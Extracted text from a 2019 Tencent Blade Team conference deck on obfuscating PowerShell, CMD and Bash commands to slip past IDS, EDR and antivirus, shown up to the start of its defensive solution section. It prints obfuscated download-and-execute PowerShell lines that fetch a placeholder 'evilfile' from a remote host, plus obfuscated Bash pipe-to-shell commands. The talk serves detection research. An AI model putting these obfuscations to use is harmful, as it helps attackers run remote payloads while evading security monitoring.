CIS2019-猫鼠游戏 持续渗透中的高级命令混淆对抗_20191126（26页）.pdf

1、猫鼠游戏:持续渗透中的高级命令混淆对抗 张尧 曾智洋 Tencent Blade Team Tencent Blade Team 受邀参加Blackhat USA、DEFCON、HITB、CanSecWest、CSS、XCon、KCon等多个海内外顶级安全会议 多次受邀参加 海内外顶级安全会议 Amazon、小米、华为等多个品牌官方认可，获小米安全年度最佳守护者，荣获华为漏洞奖励计划官方认可 获Amazon、小米、华为等多个品牌官方认可 为腾讯Tday、腾讯首届技术文化周等活劢输出泛安全影响力 输出全行业 泛安全影响力 成功发现首个TensorFlow框架自身安全漏洞，并包揽TF已知前七个漏洞

2、 谷歌TensorFlow 成功发现SQLite存在严重漏洞，影响Chromium浏览器和大量Android、iOS应用 发现SQLite严重漏洞 成功破解Amazon Echo、Google Home、小米智能音箱等IoT设备 深耕IoT领域 目录 1.问题背景：命令混淆 2.命令混淆方法 3.我们的解决方案 4.总结与讨论 1.问题背景：命令混淆 1.1 什么是混淆？1.2 命令混淆 范畴：特指操作系统原生的三个命令行程序PS/CMD.exe/Bash 对象：命令行（Command Line）常规命令 方法：基于上述三种命令行程序灵活的语法进行变形 目标：绕过目标防御设备、端点保护系统、杀

3、软的恶意命令检测 1.3 攻击路径示例Windows篇 通过漏洞进入，如永恒之蓝 目标主机 使用PS/CMD 远控服务器 将混淆命令下载至内存 内存中利用 将混淆命令放入内存 IDS/EDR/杀软 绕过 1.4 攻击路径示例Linux篇 目标主机 扫描渗透 远控服务器 使用Bash 绕过 直接执行混淆命令 下载混淆命令并执行 企业内网 IDS/EDR 通过漏洞组件进入，如WebLogic 2.命令混淆方法 2.1 简单的PowerShell混淆 Round 1 Invoke-Expression(New-Object System.Net.WebClient).DownloadString(h

4、ttp:/127.0.0.1/evilfile)Round 2 Round 3 invoke-exPressioN(+Ne+w+-+Object S)+(y+ste)+(m+.Net)+(.+WebCl)+ie+nt+()+.Dow)+(nlo+a)+dS+(tri+n)+(g(C+82h)+(t+tp:)+/+/1+(27+.0.)+(0.+1/ev+i)+(lfi+l+eC82).rEPlACE(C+82),StriNgCHaR34)Invoke-Expression(New-Object Net.WebClient).(DownloadString).Invoke(h+ttp:/127.

5、0.0.1/evilfile)echo$x77ho$u0000ami|bash 2.2 简单的Bash混淆 Round 1 whoami Round 3 Round 5 echo$x77ho$u0000ami|$(echo$(echo aHMK|base64-d)ab|rev)echo$x77ho$u0000ami|$(echo hsab|rev)Round 2 echo whoami|bash Round 4 2.3 命令混淆工具 CMD命令混淆工具：Invoke-DOSfuscation Powershell命令混淆工具：Invoke-Obfuscation、PS_obfs Bash命令混

6、淆工具：Bashfuscator、bashfuck 2.4 混淆样本示例 APT组织FIN 7中的混淆样本 PowerShell无文件木马混淆 Bashfuscator工具生成的混淆命令 3.我们的解决方案 3.1 新攻击向量带来的攻守失衡 新型混淆工具的开源让新型混淆工具的开源让混淆变得轻而易举混淆变得轻而易举 开源开源PS/CMD/BashPS/CMD/Bash混淆工具众多混淆工具众多 检测方法寥寥无几，误报很多，检测方法寥寥无几，误报很多，特别针对特别针对Linux混淆，业界尚无混淆，业界尚无已知解决方法已知解决方法 企业大规模服务器命令数据企业大规模服务器命令数据加剧命令混淆检测难度加